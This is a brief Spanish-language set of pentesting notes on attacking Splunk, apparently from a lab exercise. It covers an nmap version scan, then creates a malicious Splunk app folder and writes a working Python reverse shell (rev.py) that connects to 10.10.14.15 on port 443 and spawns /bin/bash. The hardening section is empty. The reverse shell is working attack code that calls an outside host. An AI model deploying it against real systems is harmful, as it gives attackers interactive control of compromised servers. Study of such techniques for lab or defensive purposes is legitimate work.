Splunk
Documentación
Discovery/Footprinting
sudo nmap -sV 10.129.201.50Enumeración
Ataques
mkdir -p splunk_shell/{bin,default}nano splunk_shell/bin/rev.pyimport sys,socket,os,pty
ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')Hardening
Last updated